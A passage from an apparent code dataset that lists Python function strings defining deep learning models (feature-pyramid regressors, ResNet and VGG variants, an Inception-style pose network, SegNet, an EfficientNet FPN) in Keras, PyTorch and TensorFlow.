name='FC_regression', activation='relu')(GlobalAvgPool_features)\n FC_regression2 = keras.layers.Dense(64, name='FC_regression2', activation='relu')(FC_regression)\n outputs = keras.layers.Dense(1, name='regression')(FC_regression2)\n\n if option== 'reg_fpn_p3_p7_avg':\n # compute pyramid features as per https://arxiv.org/abs/1708.02002\n features = create_pyramid_features(C3, C4, C5)\n FC_submodel = submodel_single_out(do_dropout=do_dropout, dropout_param=dropout_param)\n outputs = [FC_submodel(GAF) for GAF in features]\n\n if option== 'reg_fpn_p3_p7_min_sig' or option== 'reg_fpn_p3_p7_mle' or option== 'reg_fpn_p3_p7_min_sig_L1' or option=='reg_fpn_p3_p7_mle_L1':\n # compute pyramid features as per https://arxiv.org/abs/1708.02002\n features = create_pyramid_features(C3, C4, C5)\n FC_submodel = submodel(do_dropout=do_dropout, dropout_param=dropout_param)\n outputs = [FC_submodel(GAF) for GAF in features]\n\n if option== 'reg_fpn_p3_p7_min_sig' or option== 'reg_fpn_p3_p7_mle' or option== 'reg_fpn_p3_p7_min_sig_L1' or option=='reg_fpn_p3_p7_mle_L1':\n # compute pyramid features as per https://arxiv.org/abs/1708.02002\n features = create_pyramid_features(C3, C4, C5)\n FC_submodel = submodel(do_dropout=do_dropout, dropout_param=dropout_param)\n outputs = [FC_submodel(GAF) for GAF in features]\n\n\n return keras.models.Model(inputs=inputs, outputs=outputs, name=name)", "def __init__(self, options):\r\n nn.Module.__init__(self)\r\n # Convolution and pooling layers of VGG-16.\r\n self.basemodel = torchvision.models.resnet18(pretrained=True)\r\n self.options = options\r\n\r\n #label\r\n self.label_primary = nn.Linear(options['primary_dim'], options['proj_dim'])\r\n self.label_dual = nn.Linear(options['dual_dim'], options['proj_dim'])\r\n\r\n #classifer/regressor\r\n self.fc_primary = nn.Linear(512 + options['proj_dim'], options['primary_dim'])\r\n self.fc_dual = nn.Linear(512 + options['proj_dim'], options['dual_dim'])\r\n\r\n\r\n if self.options['fc'] == True:\r\n # Freeze all previous layers.\r\n for param in self.basemodel.parameters():\r\n param.requires_grad = False\r\n # Initialize the fc layers.\r\n nn.init.kaiming_normal_(self.fc_primary.weight.data)\r\n if self.fc_primary.bias is not None:\r\n nn.init.constant_(self.fc_primary.bias.data, val=0)\r\n\r\n nn.init.kaiming_normal_(self.fc_dual.weight.data)\r\n if self.fc_dual.bias is not None:\r\n nn.init.constant_(self.fc_dual.bias.data, val=0)\r\n\r\n nn.init.kaiming_normal_(self.label_primary.weight.data)\r\n if self.label_primary.bias is not None:\r\n nn.init.constant_(self.label_primary.bias.data, val=0)\r\n\r\n 
nn.init.kaiming_normal_(self.label_dual.weight.data)\r\n if self.label_dual.bias is not None:\r\n nn.init.constant_(self.label_dual.bias.data, val=0)\r\n\r\n\r\n else:\r\n for param in self.basemodel.conv1.parameters():\r\n param.requires_grad = False\r\n for param in self.basemodel.bn1.parameters():\r\n param.requires_grad = False\r\n for param in self.basemodel.layer1.parameters():\r\n param.requires_grad = False\r\n #for param in self.basemodel.layer2.parameters():\r\n # param.requires_grad = False\r\n #for param in self.basemodel.layer3.parameters():\r\n # param.requires_grad = False\r", "def create(self):\n \n \"\"\" A solo prepressing reduction network in the head \"\"\"\n print(\"pre_reduction\")\n with tf.name_scope('pre_reduction'):\n conv1 = NW.conv(self.X, 7, 7, 64, 2, 2, name='conv1')\n pool1 = NW.max_pool(conv1, 3, 3, 2, 2, name='pool1')\n norm1 = NW.lrn(pool1, 2, 2e-05, 0.75, name='norm1')\n reduction2 = NW.conv(norm1, 1, 1, 64, 1, 1, name='reduction2')\n conv2 = NW.conv(reduction2, 3, 3, 192, 1, 1,name='conv2')\n norm2 = NW.lrn(conv2, 2, 2e-05, 0.75, name='norm2')\n pool2 = NW.max_pool(norm2, 3, 3, 2, 2, name='pool2')\n \n \"\"\" 1st inception layer group \"\"\"\n print(\"icp1\")\n with tf.name_scope('icp1'):\n # branch 0\n icp1_out0 = NW.conv(pool2, 1, 1, 64, 1, 1, name='icp1_out0')\n # branch 1\n icp1_reduction1 = NW.conv(pool2, 1, 1, 96, 1, 1, name='icp1_reduction1')\n icp1_out1 = NW.conv(icp1_reduction1, 3, 3, 128, 1, 1, name='icp1_out1')\n # branch 2\n icp1_reduction2 = NW.conv(pool2, 1, 1, 16, 1, 1, name='icp1_reduction2')\n icp1_out2 = NW.conv(icp1_reduction2, 5, 5, 32, 1, 1, name='icp1_out2')\n # branch 3\n icp1_pool = NW.max_pool(pool2, 3, 3, 1, 1, name='icp1_pool')\n icp1_out3 = NW.conv(icp1_pool, 1, 1, 32, 1, 1, name='icp1_out3')\n # concat\n icp2_in = NW.concat([icp1_out0,\n icp1_out1,\n icp1_out2,\n icp1_out3], 3, 'icp2_in')\n\n \"\"\" 2nd inception layer group \"\"\"\n print(\"icp2\")\n with tf.name_scope('icp2'):\n # branch 0\n icp2_out0 = NW.conv(icp2_in, 1, 1, 128, 1, 1, name='icp2_out0')\n # branch 1\n icp2_reduction1 = NW.conv(icp2_in, 1, 1, 128, 1, 1, name='icp2_reduction1')\n icp2_out1 = NW.conv(icp2_reduction1, 3, 3, 192, 1, 1, name='icp2_out1')\n # branch 2\n icp2_reduction2 = NW.conv(icp2_in, 1, 1, 32, 1, 1, name='icp2_reduction2')\n icp2_out2 = NW.conv(icp2_reduction2, 5, 5, 96, 1, 1, name='icp2_out2')\n # branch 3\n icp2_pool = NW.max_pool(icp2_in, 3, 3, 1, 1, name='icp2_pool')\n icp2_out3 = NW.conv(icp2_pool, 1, 1, 64, 1, 1, name='icp2_out3')\n # concat\n icp2_out = NW.concat([icp2_out0,\n icp2_out1,\n icp2_out2,\n icp2_out3], 3, 'icp2_out')\n \n \"\"\" 3rd inception layer group \"\"\"\n print(\"icp3\")\n with tf.name_scope('icp3'):\n icp3_in = NW.max_pool(icp2_out, 3, 3, 2, 2, name='icp3_in')\n # branch 0\n icp3_out0 = NW.conv(icp3_in, 1, 1, 192, 1, 1, name='icp3_out0')\n # branch 1\n icp3_reduction1 = NW.conv(icp3_in, 1, 1, 96, 1, 1, name='icp3_reduction1')\n icp3_out1 = NW.conv(icp3_reduction1, 3, 3, 208, 1, 1, name='icp3_out1')\n # branch 2\n icp3_reduction2 = NW.conv(icp3_in, 1, 1, 16, 1, 1, name='icp3_reduction2')\n icp3_out2 = NW.conv(icp3_reduction2, 5, 5, 48, 1, 1, name='icp3_out2')\n # branch 3\n icp3_pool = NW.max_pool(icp3_in, 3, 3, 1, 1, name='icp3_pool')\n icp3_out3 = NW.conv(icp3_pool, 1, 1, 64, 1, 1, name='icp3_out3')\n # concat\n icp3_out = NW.concat([icp3_out0,\n icp3_out1,\n icp3_out2,\n icp3_out3], 3, 'icp3_out')\n \n \"\"\" 1st classify branch \"\"\"\n with tf.name_scope('cls1'):\n cls1_pool = NW.avg_pool(icp3_out, 5, 5, 3, 3, 
padding='VALID', name='cls1_pool')\n cls1_reduction_pose = NW.conv(cls1_pool, 1, 1, 128, 1, 1, name='cls1_reduction_pose')\n cls1_fc1_pose = NW.fc(cls1_reduction_pose, 1024, name='cls1_fc1_pose')\n cls1_fc_pose_xy = NW.fc(cls1_fc1_pose, 2, relu=False, name='cls1_fc_pose_xy')\n cls1_fc_pose_ab = NW.fc(cls1_fc1_pose, 2, relu=False, name='cls1_fc_pose_ab')\n self.layers[\"cls1_fc_pose_xy\"] = cls1_fc_pose_xy\n self.layers[\"cls1_fc_pose_ab\"] = cls1_fc_pose_ab\n \n \"\"\" 4st inception layer group \"\"\"\n print(\"icp4\")\n with tf.name_scope('icp4'):\n # branch 0\n icp4_out0 = NW.conv(icp3_out, 1, 1, 160, 1, 1, name='icp4_out0')\n # branch 1\n icp4_reduction1 = NW.conv(icp3_out, 1, 1, 112, 1, 1, name='icp4_reduction1')\n icp4_out1 = NW.conv(icp4_reduction1, 3, 3, 224, 1, 1, name='icp4_out1')\n # branch 2\n icp4_reduction2 = NW.conv(icp3_out, 1, 1, 24, 1, 1, name='icp4_reduction2')\n icp4_out2 = NW.conv(icp4_reduction2, 5, 5, 64, 1, 1, name='icp4_out2')\n # branch 3\n icp4_pool = NW.max_pool(icp3_out, 3, 3, 1, 1, name='icp4_pool')\n icp4_out3 = NW.conv(icp4_pool, 1, 1, 64, 1, 1, name='icp4_out3')\n # concat\n icp4_out = NW.concat([icp4_out0,\n icp4_out1,\n icp4_out2,\n icp4_out3],3, name='icp4_out')\n\n \"\"\" 5st inception layer group \"\"\"\n print(\"icp5\")\n with tf.name_scope('icp5'):\n # branch 0\n icp5_out0 = NW.conv(icp4_out, 1, 1, 128, 1, 1, name='icp5_out0')\n # branch 1\n icp5_reduction1 = NW.conv(icp4_out, 1, 1, 128, 1, 1, name='icp5_reduction1')\n icp5_out1 = NW.conv(icp5_reduction1, 3, 3, 256, 1, 1, name='icp5_out1')\n # branch 2\n icp5_reduction2 = NW.conv(icp4_out,1, 1, 24, 1, 1, name='icp5_reduction2')\n icp5_out2 = NW.conv(icp5_reduction2, 5, 5, 64, 1, 1, name='icp5_out2')\n # branch 3\n icp5_pool = NW.max_pool(icp4_out,3, 3, 1, 1, name='icp5_pool')\n icp5_out3 = NW.conv(icp5_pool, 1, 1, 64, 1, 1, name='icp5_out3')\n # concat\n icp5_out = NW.concat([icp5_out0, \n icp5_out1, \n icp5_out2, \n icp5_out3], 3, name='icp5_out')\n \n \"\"\" 6st inception layer group \"\"\"\n print(\"icp6\")\n with tf.name_scope('icp6'):\n # branch 0\n icp6_out0 = NW.conv(icp5_out, 1, 1, 112, 1, 1, name='icp6_out0')\n # branch 1\n icp6_reduction1 = NW.conv(icp5_out, 1, 1, 144, 1, 1, name='icp6_reduction1')\n icp6_out1 = NW.conv(icp6_reduction1, 3, 3, 288, 1, 1, name='icp6_out1')\n # branch 2\n icp6_reduction2 = NW.conv(icp5_out, 1, 1, 32, 1, 1, name='icp6_reduction2')\n icp6_out2 = NW.conv(icp6_reduction2, 5, 5, 64, 1, 1, name='icp6_out2')\n # branch 3\n icp6_pool = NW.max_pool(icp5_out,3, 3, 1, 1, name='icp6_pool')\n icp6_out3 = NW.conv(icp6_pool, 1, 1, 64, 1, 1, name='icp6_out3')\n # concat\n icp6_out = NW.concat([icp6_out0,\n icp6_out1,\n icp6_out2,\n icp6_out3], 3, name='icp6_out')\n\n \"\"\" 2nd classify branch \"\"\"\n with tf.name_scope('cls2'):\n cls2_pool = NW.avg_pool(icp6_out, 5, 5, 3, 3, padding='VALID', name='cls2_pool')\n cls2_reduction_pose = NW.conv(cls2_pool, 1, 1, 128, 1, 1, name='cls2_reduction_pose')\n cls2_fc1 = NW.fc(cls2_reduction_pose, 1024, name='cls2_fc1')\n cls2_fc_pose_xy = NW.fc(cls2_fc1, 2, relu=False, name='cls2_fc_pose_xy')\n cls2_fc_pose_ab = NW.fc(cls2_fc1, 2, relu=False, name='cls2_fc_pose_ab')\n self.layers[\"cls2_fc_pose_xy\"] = cls2_fc_pose_xy\n self.layers[\"cls2_fc_pose_ab\"] = cls2_fc_pose_ab\n\n \"\"\" 7st inception layer group \"\"\"\n print(\"icp7\")\n with tf.name_scope('icp7'):\n # branch 0\n icp7_out0 = NW.conv(icp6_out, 1, 1, 256, 1, 1, name='icp7_out0')\n # branch 1\n icp7_reduction1 = NW.conv(icp6_out, 1, 1, 160, 1, 1, name='icp7_reduction1')\n 
icp7_out1 = NW.conv(icp7_reduction1, 3, 3, 320, 1, 1, name='icp7_out1')\n # branch 2\n icp7_reduction2 = NW.conv(icp6_out, 1, 1, 32, 1, 1, name='icp7_reduction2')\n icp7_out2 = NW.conv(icp7_reduction2, 5, 5, 128, 1, 1, name='icp7_out2')\n # branch 3\n icp7_pool = NW.max_pool(icp6_out, 3, 3, 1, 1, name='icp7_pool')\n icp7_out3 = NW.conv(icp7_pool, 1, 1, 128, 1, 1, name='icp7_out3')\n # concat\n icp7_out = NW.concat([icp7_out0,\n icp7_out1,\n icp7_out2,\n icp7_out3], 3, name='icp7_out')\n\n \"\"\" 8st inception layer group \"\"\"\n print(\"icp8\")\n with tf.name_scope('icp8'):\n icp8_in = NW.max_pool(icp7_out, 3, 3, 2, 2, name='icp8_in')\n # branch 0\n icp8_out0 = NW.conv(icp8_in, 1, 1, 256, 1, 1, name='icp8_out0')\n # branch 1\n icp8_reduction1 = NW.conv(icp8_in, 1, 1, 160, 1, 1, name='icp8_reduction1')\n icp8_out1 = NW.conv(icp8_reduction1, 3, 3, 320, 1, 1, name='icp8_out1')\n # branch 2\n icp8_reduction2 = NW.conv(icp8_in, 1, 1, 32, 1, 1, name='icp8_reduction2')\n icp8_out2 = NW.conv(icp8_reduction2, 5, 5, 128, 1, 1, name='icp8_out2')\n # branch 3\n icp8_pool = NW.max_pool(icp8_in, 3, 3, 1, 1, name='icp8_pool')\n icp8_out3 = NW.conv(icp8_pool, 1, 1, 128, 1, 1, name='icp8_out3')\n # concat\n icp8_out = NW.concat([icp8_out0,\n icp8_out1,\n icp8_out2,\n icp8_out3], 3, name='icp8_out')\n \n \"\"\" 9st inception layer group \"\"\"\n print(\"icp9\")\n with tf.name_scope('icp9'):\n # branch 0\n icp9_out0 = NW.conv(icp8_out, 1, 1, 384, 1, 1, name='icp9_out0')\n # branch 1\n icp9_reduction1 = NW.conv(icp8_out, 1, 1, 192, 1, 1, name='icp9_reduction1')\n icp9_out1 = NW.conv(icp9_reduction1, 3, 3, 384, 1, 1, name='icp9_out1')\n # branch 2\n icp9_reduction2 = NW.conv(icp8_out, 1, 1, 48, 1, 1, name='icp9_reduction2')\n icp9_out2 = NW.conv(icp9_reduction2, 5, 5, 128, 1, 1, name='icp9_out2')\n # branch 3\n icp9_pool = NW.max_pool(icp8_out, 3, 3, 1, 1, name='icp9_pool')\n icp9_out3 = NW.conv(icp9_pool, 1, 1, 128, 1, 1, name='icp9_out3')\n # concat\n icp9_out = NW.concat([icp9_out0,\n icp9_out1,\n icp9_out2,\n icp9_out3], 3, name='icp9_out')\n\n \"\"\" 3rd classify branch \"\"\"\n with tf.name_scope('cls3'):\n cls3_pool = NW.avg_pool(icp9_out, 7, 7, 1, 1, padding='VALID', name='cls3_pool')\n cls3_fc1_pose = NW.fc(cls3_pool, 2048, name='cls3_fc1_pose')\n cls3_fc_pose_xy = NW.fc(cls3_fc1_pose, 2, relu=False, name='cls3_fc_pose_xy')\n cls3_fc_pose_ab = NW.fc(cls3_fc1_pose, 2, relu=False, name='cls3_fc_pose_ab')\n self.layers[\"cls3_fc_pose_xy\"] = cls3_fc_pose_xy\n self.layers[\"cls3_fc_pose_ab\"] = cls3_fc_pose_ab", "def __init__(self, n_input_channels=3, n_conv_output_channels=16, k=3, s=1, pad=1, p = 0.5):\n super(ModelCNN, self).__init__()\n # 1. 
Convolutional layers\n # Single image is in shape: 3x96x96 (CxHxW, H==W), RGB images\n self.conv1 = nn.Conv2d(in_channels = n_input_channels, out_channels = n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn1 = nn.BatchNorm2d(n_conv_output_channels)\n self.conv2 = nn.Conv2d(in_channels = n_conv_output_channels, out_channels = 2*n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn2 = nn.BatchNorm2d(2*n_conv_output_channels)\n self.conv3 = nn.Conv2d(in_channels = 2*n_conv_output_channels, out_channels = 4*n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn3 = nn.BatchNorm2d(4*n_conv_output_channels)\n self.conv4 = nn.Conv2d(in_channels = 4*n_conv_output_channels, out_channels = 8*n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn4 = nn.BatchNorm2d(8*n_conv_output_channels)\n self.pool = nn.MaxPool2d(kernel_size = k - 1, stride = 2*s, padding = pad - pad)\n \n self.dropout = nn.Dropout(p = p)\n \n # 2. FC layers to final output\n self.fc1 = nn.Linear(in_features = 288*n_conv_output_channels, out_features = 32*n_conv_output_channels)\n self.fc_bn1 = nn.BatchNorm1d(32*n_conv_output_channels)\n self.fc2 = nn.Linear(in_features = 32*n_conv_output_channels, out_features = 16*n_conv_output_channels)\n self.fc_bn2 = nn.BatchNorm1d(16*n_conv_output_channels)\n self.fc3 = nn.Linear(in_features = 16*n_conv_output_channels, out_features = 8*n_conv_output_channels)\n self.fc_bn3 = nn.BatchNorm1d(8*n_conv_output_channels)\n self.fc4 = nn.Linear(in_features = 8*n_conv_output_channels, out_features = 1)", "def setup_net(self):\n\t\tself.src_net = get_model(self.base_model, num_cls=self.num_cls, \\\n\t\t\t\t\t\t\t\t l2_normalize=self.l2_normalize, temperature=self.temperature)\n\t\tself.tgt_net = self.custom_copy(self.src_net, self.weight_sharing)\n\n\t\tinput_dim = self.num_cls\n\t\tself.discriminator = nn.Sequential(\n\t\t\t\tnn.Linear(input_dim, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 2),\n\t\t\t\t)\n\n\t\tself.image_size = self.src_net.image_size\n\t\tself.num_channels = self.src_net.num_channels", "def __init__(self, num_classes):\n super().__init__()\n # maintains size of 128x128\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, stride=1, padding=1)\n # maintains size of 64x64\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1)\n # Half size\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n # Original image of size 128x128 is halved twice to 32 * 32. 
With 64 channels flattened is 32 * 32 * 64\n self.fc1 = nn.Linear(32 * 32 * 64, 1000)\n self.fc2 = nn.Linear(1000, num_classes)\n self.dropout = nn.Dropout()", "def create_base_network(NumberOfFeatures, NumberOfClasses,init_mode='glorot_normal'):\n network = Sequential()\n network.add(Dense(44, activation='sigmoid', kernel_initializer=init_mode,input_dim=NumberOfFeatures))\n# network.add(Dense(22, activation='sigmoid',kernel_initializer=init_mode))\n network.add(Dense(NumberOfClasses, activation='softmax',kernel_initializer=init_mode))\n return network", "def __init__(self):\n torch.nn.Module.__init__(self)\n ######################### Convolution and pooling layers of VGG-16.\n self.features = torchvision.models.vgg16(pretrained=True).features # fine tune?\n self.features = torch.nn.Sequential(*list(self.features.children())\n [:-22]) # Remove pool2 and rest, lack of computational resource\n # No grad for convVGG\n # for param in self.features.parameters():\n # param.requires_grad = False\n\n #################### Channel Grouping Net\n # self.fc1_ = torch.nn.Linear(128, 128*16)#lack of resource\n # self.fc2_ = torch.nn.Linear(128, 128*16)\n # self.fc3_ = torch.nn.Linear(128, 128*16)\n #\n # torch.nn.init.kaiming_normal_(self.fc1_.weight.data, nonlinearity='relu')\n # if self.fc1_.bias is not None:\n # torch.nn.init.constant_(self.fc1_.bias.data, val=0) # fc层的bias进行constant初始化\n # torch.nn.init.kaiming_normal_(self.fc2_.weight.data, nonlinearity='relu')\n # if self.fc2_.bias is not None:\n # torch.nn.init.constant_(self.fc2_.bias.data, val=0) # fc层的bias进行constant初始化\n # torch.nn.init.kaiming_normal_(self.fc3_.weight.data, nonlinearity='relu')\n # if self.fc3_.bias is not None:\n # torch.nn.init.constant_(self.fc3_.bias.data, val=0) # fc层的bias进行constant初始化\n\n self.fc1 = torch.nn.Linear(128*28*28, 128)\n self.fc2 = torch.nn.Linear(128*28*28, 128)\n self.fc3 = torch.nn.Linear(128*28*28, 128)\n\n\n torch.nn.init.kaiming_normal_(self.fc1.weight.data, nonlinearity='relu')\n if self.fc1.bias is not None:\n torch.nn.init.constant_(self.fc1.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.fc2.weight.data, nonlinearity='relu')\n if self.fc2.bias is not None:\n torch.nn.init.constant_(self.fc2.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.fc3.weight.data, nonlinearity='relu')\n if self.fc3.bias is not None:\n torch.nn.init.constant_(self.fc3.bias.data, val=0) # fc层的bias进行constant初始化\n\n self.layerNorm=nn.LayerNorm([224,224])\n\n # global grad for hook\n self.image_reconstruction = None\n self.register_hooks()\n self.GradWeight=1e-1\n\n # ################### STN input N*3*448*448\n # self.localization = [\n # nn.Sequential(\n # nn.MaxPool2d(4,stride=4),#112\n # nn.ReLU(True),\n #\n # nn.Conv2d(3, 32, kernel_size=5,stride=1,padding=2), # 112\n # nn.MaxPool2d(2, stride=2), # 56\n # nn.ReLU(True),\n #\n # nn.Conv2d(32, 48, kernel_size=3,stride=1,padding=1),\n # nn.MaxPool2d(2, stride=2), # 56/2=28\n # nn.ReLU(True),\n #\n # nn.Conv2d(48, 64, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 28/2=14\n # nn.ReLU(True) #output 64*14*14\n # ).cuda(),\n # nn.Sequential(\n # nn.MaxPool2d(4, stride=4), # 112\n # nn.ReLU(True),\n #\n # nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2), # 112\n # nn.MaxPool2d(2, stride=2), # 56\n # nn.ReLU(True),\n #\n # nn.Conv2d(32, 48, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 56/2=28\n # nn.ReLU(True),\n #\n # nn.Conv2d(48, 64, kernel_size=3, stride=1, 
padding=1),\n # nn.MaxPool2d(2, stride=2), # 28/2=14\n # nn.ReLU(True) # output 64*14*14\n # ).cuda(),\n # nn.Sequential(\n # nn.MaxPool2d(4, stride=4), # 112\n # nn.ReLU(True),\n #\n # nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2), # 112\n # nn.MaxPool2d(2, stride=2), # 56\n # nn.ReLU(True),\n #\n # nn.Conv2d(32, 48, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 56/2=28\n # nn.ReLU(True),\n #\n # nn.Conv2d(48, 64, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 28/2=14\n # nn.ReLU(True) # output 64*14*14\n # ).cuda()\n # ]\n # # Regressor for the 3 * 2 affine matrix\n # self.fc_loc = [\n # nn.Sequential(\n # nn.Linear(64 * 14 * 14, 32),\n # nn.ReLU(True),\n # nn.Linear(32, 3 * 2)\n # ).cuda(),\n # nn.Sequential(\n # nn.Linear(64 * 14 * 14, 32),\n # nn.ReLU(True),\n # nn.Linear(32, 3 * 2)\n # ).cuda(),\n # nn.Sequential(\n # nn.Linear(64 * 14 * 14, 32),\n # nn.ReLU(True),\n # nn.Linear(32, 3 * 2)\n # ).cuda()\n # ]\n # # Initialize the weights/bias with identity transformation\n # for fc_locx in self.fc_loc:\n # fc_locx[2].weight.data.zero_()\n # fc_locx[2].bias.data.copy_(torch.tensor([1, 0, 0, 0, 1, 0], dtype=torch.float))\n\n ########################Bilinear CNN output 256 channels\n self.bcnnConv_1=torch.nn.Sequential(*list(torchvision.models.vgg16(pretrained=True).features.children())\n [:-1]) # Remove pool3 and rest.\n self.bcnnConv_2 = torch.nn.Sequential(*list(torchvision.models.vgg16(pretrained=True).features.children())\n [:-1]) # Remove pool3 and rest.\n self.bcnnConv_3 = torch.nn.Sequential(*list(torchvision.models.vgg16(pretrained=True).features.children())\n [:-1]) # Remove pool3 and rest.\n #BCNN Linear classifier.\n self.bfc1 = torch.nn.Linear(512*512, 200)\n self.bfc2 = torch.nn.Linear(512*512, 200)\n self.bfc3 = torch.nn.Linear(512*512, 200)\n torch.nn.init.kaiming_normal_(self.bfc1.weight.data) # 何凯明初始化\n if self.bfc1.bias is not None:\n torch.nn.init.constant_(self.bfc1.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.bfc2.weight.data) # 何凯明初始化\n if self.bfc2.bias is not None:\n torch.nn.init.constant_(self.bfc2.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.bfc3.weight.data) # 何凯明初始化\n if self.bfc3.bias is not None:\n torch.nn.init.constant_(self.bfc3.bias.data, val=0) # fc层的bias进行constant初始化\n\n # self.CBP1 = CompactBilinearPooling(512, 512, 50000)\n # self.CBP2 = CompactBilinearPooling(512, 512, 50000)\n # self.CBP3 = CompactBilinearPooling(512, 512, 50000)", "def __init__(self, in_channels=3, in_channels1=3, n_classes=21):\n super(SegNet, self).__init__()\n\n self.layer_1 = SegnetLayer_Encoder(in_channels, 64, 2)\n self.layer_2 = SegnetLayer_Encoder(64, 128, 2)\n self.layer_3 = SegnetLayer_Encoder(128, 256, 3)\n self.layer_4 = SegnetLayer_Encoder(256, 512, 3)\n self.layer_5 = SegnetLayer_Encoder(512, 512, 3)\n\n self.layer_6 = SegnetLayer_Decoder(512, 512, 3)\n self.layer_7 = SegnetLayer_Decoder(512, 256, 3)\n self.layer_8 = SegnetLayer_Decoder(256, 128, 3)\n self.layer_9 = SegnetLayer_Decoder(128, 64, 2)\n self.layer_10 = SegnetLayer_Decoder(64, n_classes, 2)\n\n self.layer_11 = SegnetLayer_Encoder(in_channels1, 64, 2)\n self.layer_12 = SegnetLayer_Encoder(64, 128, 2)\n self.layer_13 = SegnetLayer_Encoder(128, 256, 3)\n self.layer_14 = SegnetLayer_Encoder(256, 512, 3)\n self.layer_15 = SegnetLayer_Encoder(512, 512, 3)\n\n self.layer_16 = SegnetLayer_Decoder(512, 512, 3)\n self.layer_17 = SegnetLayer_Decoder(512, 256, 3)\n self.layer_18 = 
SegnetLayer_Decoder(256, 128, 3)\n self.layer_19 = SegnetLayer_Decoder(128, 64, 2)\n self.layer_110 = SegnetLayer_Decoder(64, n_classes, 2)\n\n self.layer_1110 = UNet_Decoder_Particular(n_classes * 2, n_classes)", "def __init__(self, slug, num_filters=256, pretrained=True, bifpn=False):\n self.slug = slug\n\n super().__init__()\n if not pretrained:\n print(\"Caution, not loading pretrained weights.\")\n\n if slug == \"eff5\":\n basemodel = timm.create_model('tf_efficientnet_b5_ns', pretrained=pretrained)\n num_bottleneck_filters = 512\n else:\n assert False, \"Bad slug: %s\" % slug\n \n self.bifpn = bifpn\n if bifpn:\n self.BiFPN = BiFPN(num_filters)\n # Access resnet directly in forward pass; do not store refs here due to\n # https://github.com/pytorch/pytorch/issues/8392\n\n self.lateral4 = Conv1x1(num_bottleneck_filters, num_filters)\n self.lateral3 = Conv1x1(176, num_filters)\n self.lateral2 = Conv1x1(64, num_filters)\n self.lateral1 = Conv1x1(40, num_filters)\n\n self.smooth4 = Conv3x3(num_filters, num_filters)\n self.smooth3 = Conv3x3(num_filters, num_filters)\n self.smooth2 = Conv3x3(num_filters, num_filters)\n self.smooth1 = Conv3x3(num_filters, num_filters)\n \n self.enc1 = nn.Sequential(basemodel.blocks[0:2])\n self.enc2 = nn.Sequential(basemodel.blocks[2:3])\n self.enc3 = nn.Sequential(basemodel.blocks[3:5])\n self.enc4 = nn.Sequential(basemodel.blocks[5:7])\n \n self.enc0 = nn.Sequential(basemodel.conv_stem, basemodel.bn1, basemodel.act1)", "def __call__(self, **kwargs):\n segname = 'block_{}_expand_relu'\n blocks = [13, 6, 3, 1]\n skips = [self._backbone.get_layer(segname.format(i)) for i in blocks]\n backbone_out = self._backbone.get_layer('block_16_project')\n\n p5 = self._fpn_block(backbone_out.output, skips[0].output)\n p4 = self._fpn_block(p5, skips[1].output)\n p3 = self._fpn_block(p4, skips[2].output)\n p2 = self._fpn_block(p3, skips[3].output)\n\n s5 = self._conv_block(p5, 128)\n s4 = self._conv_block(p4, 128)\n s3 = self._conv_block(p3, 128)\n s2 = self._conv_block(p2, 128)\n\n s5 = tf.keras.layers.UpSampling2D(\n size=(8, 8),\n interpolation='nearest'\n )(s5)\n\n s4 = tf.keras.layers.UpSampling2D(\n size=(4, 4),\n interpolation='nearest'\n )(s4)\n\n s3 = tf.keras.layers.UpSampling2D(\n size=(2, 2),\n interpolation='nearest'\n )(s3)\n\n concat = [s5, s4, s3, s2]\n x = tf.keras.layers.Concatenate()(concat)\n x = tf.keras.layers.Conv2D(\n 64,\n kernel_size=3,\n padding='same',\n kernel_initializer='he_uniform'\n )(x)\n\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.Activation('relu')(x)\n x = tf.keras.layers.UpSampling2D((2, 2))(x)\n\n x = tf.keras.layers.Conv2D(\n 1,\n kernel_size=3,\n padding='same',\n kernel_initializer='he_uniform'\n )(x)\n\n out = tf.keras.layers.Activation('sigmoid')(x)\n model = tf.keras.models.Model(\n inputs=self._backbone.input,\n outputs=out\n )\n\n return model", "def conv_net(x, keep_prob, nconv1, nconv2, nfullyconn, nfullyconn2):\n # TODO: Apply 1, 2, or 3 Convolution and Max Pool layers\n # Play around with different number of outputs, kernel size and stride\n # Function Definition from Above:\n # conv2d_maxpool(x_tensor, conv_num_outputs, conv_ksize, conv_strides, pool_ksize, pool_strides)\n #layer_norm = tflearn.layers.normalization.batch_normalization (x, name='BatchNormalization')\n layer_conv = conv2d_maxpool(x, nconv1, (2,2), (2,2), (2,2), (2,2))\n #layer_conv = tf.nn.dropout(layer_conv, keep_prob)\n layer_conv = tf.layers.batch_normalization (layer_conv, name='BatchNormalization')\n #layer_conv = 
